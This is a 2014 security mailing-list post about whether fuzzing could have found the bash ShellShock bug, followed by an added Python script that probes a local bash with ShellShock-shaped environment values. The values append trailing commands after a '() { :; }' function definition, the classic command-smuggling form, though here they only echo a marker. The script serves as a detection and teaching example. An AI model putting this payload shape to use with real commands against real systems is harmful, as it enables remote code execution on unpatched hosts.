bashing your head against nation-state social engineering

Stephan Neuhaus stephan.neuhaus@tik.ee.ethz.ch
Fri Oct 3 23:54:40 PDT 2014


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 2014-10-03, 23:14, cyryl wrote:
> On 29/09/14 08:58, Stephan Neuhaus wrote:
>> On 2014-09-28 15:47, Subrosa.io wrote:
>>> I think this vulnerability should have been discovered with any
>>> kind of basic fuzzing.
>> 
>> If I understand the vulnerability correctly, it occurs in very
>> specific circumstances, namely trailing data at the end of a
>> function definition that's transported in an environment
>> variable.
>> 
>> In that case, I'd venture that *no* kind of "basic fuzzing" could
>> have uncovered this; the proportion of ShellShock-inducing
>> environment variable definitions among all possible environment
>> variables is simply too small.
>> 
>> What you would need instead is very specific syntax-directed
>> fuzzing, and even then I'm not sure that you have a decent chance
>> of discovering this without knowing already that it's there.
>> 
> 
> To uncover more vulns lcamtuf fed the fuzzer with the initial
> state, but then left it there to do the work.
> 
> http://lcamtuf.blogspot.nl/2014/10/bash-bug-how-we-finally-cracked.html

Without belittling the effort that's described in this article (after
all, they found more vulnerabilities, which is good), I stand by my
original point.  If you want to fuzz the whole of bash, your chances
of uncovering ShellShock are essentially nil.  Once you know that
function definitions transported in environment variables (a feature
that I didn't even know existed, and I've been working with bash since
the late 90's) are probably bug-ridden, your work becomes much, much
easier.

Fun,

Stephan
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.21 (Darwin)

iQEcBAEBAgAGBQJUL5mlAAoJEE0T/LJL2oHTGxgIAKuBg2aFEesnrAd4qWiGEqfx
0E6SWWkJLkYEGD4gDcMQW5XVUUP45kJdINKZFd/rFY3Ep47VXHJ0zD89XrP4YVHH
+ujQMH4lF7+GLiVZ/tNYZCQ0k/t/9LBUS2bcvjuqIUxlmkzZN8UFFsD1L3/t+HDD
LBAmRi28Z4TOREOdHRga9BdpAKTHy7I4toHoiiA3x1psJxwkqr9WD8C7CLABWCeC
j6Gs1U5gqhCTOg0nz9DV8owuUJG1XqyOwApqC6hf1LZFWzr9WAR0G9Y+Xot4mdlJ
8s9Dkf9iEuN5nJpOPH9Hunhpoaxu8/B/TNYFvRYjE7zac3Icd8Hj3mu0TUc6RwY=
=8VXa
-----END PGP SIGNATURE-----
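The path Stephan describes, trailing data after a function definition carried in an environment variable, and the contrast with undirected fuzzing, as an added example in Python. This is not code from the thread or from lcamtuf's post; it assumes only a `bash` binary on PATH, and the marker string, the env var name `PROBE` and all candidate values are constructed here.

```python
"""Syntax-directed probing of bash's exported-function importer.

Every candidate is built to have the shape the importer keys on, a value
beginning with "() {", followed by a trailing tail.  The marker string, the
tails and the env var name PROBE are constructed for this example.
"""
import random
import shutil
import string
import subprocess

# Appears on stdout only if bash executed the trailing data at import time.
MARKER = "MARKER_7f3a_trailing_executed"

# Minimal exported-function body.  bash recognises an environment value as
# a function definition by the "() {" prefix.
BODY = "() { :; }"

# Tails appended after the closing brace.  An unpatched importer (the
# CVE-2014-6271 behaviour) parses and runs well-formed trailing commands;
# malformed tails exercise the parser's error paths instead.
TAILS = [
    "",                       # no trailing data: a clean definition
    f"; echo {MARKER}",       # the classic trailing command
    f"\necho {MARKER}",       # newline instead of semicolon
    f"; echo {MARKER} ; ",    # trailing whitespace after the command
    "; (",                    # unbalanced paren
    "; echo ${",              # unterminated expansion
]


def looks_like_exported_function(value: str) -> bool:
    """Would bash's importer even consider this value? (prefix check)"""
    return value.startswith("() {")


def gen_candidates(seed: int, count: int) -> list:
    """Syntax-directed generator: body variants x tails, seeded for replay."""
    rng = random.Random(seed)
    bodies = [BODY, "() {  :; }", "() { :;}", "() { true; }"]
    return [rng.choice(bodies) + rng.choice(TAILS) for _ in range(count)]


def random_candidates(seed: int, count: int, length: int = 12) -> list:
    """Undirected baseline: random printable strings of a fixed length."""
    rng = random.Random(seed)
    alphabet = string.printable.strip()
    return ["".join(rng.choice(alphabet) for _ in range(length))
            for _ in range(count)]


def probe(value: str, timeout: float = 5.0):
    """Set one env var to `value` and run a trivial bash command.

    True: marker seen on stdout, i.e. trailing data ran at import time.
    False: no marker.  None: no bash on PATH, nothing was run.
    """
    bash = shutil.which("bash")
    if bash is None:
        return None
    env = {"PATH": "/usr/bin:/bin", "PROBE": value}
    try:
        res = subprocess.run([bash, "-c", "echo probe-done"], env=env,
                             capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return False
    return MARKER in res.stdout


def fuzz(seed: int = 1, count: int = 24) -> dict:
    """Run the directed candidates through bash and summarise the run."""
    cands = gen_candidates(seed, count)
    hits = [c for c in cands if probe(c) is True]
    return {
        "total": len(cands),
        "hits": hits,
        "directed_shaped": sum(map(looks_like_exported_function, cands)),
        "random_shaped": sum(map(looks_like_exported_function,
                                 random_candidates(seed, count * 1000))),
    }


if __name__ == "__main__":
    summary = fuzz()
    print(f"{summary['directed_shaped']}/{summary['total']} directed candidates "
          f"have the importer's shape; {summary['random_shaped']} of "
          f"{summary['total'] * 1000} random strings do")
    if summary["hits"]:
        print("importer executed trailing data for:", summary["hits"])
    else:
        print("no trailing data executed (patched bash, or no bash found)")
```

On any bash carrying the September 2014 fixes `hits` stays empty; the thing to look at is the ratio: every directed candidate has the shape the importer matches on, while random strings essentially never do, which is the reason undirected fuzzing of the whole of bash would not reach this path.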


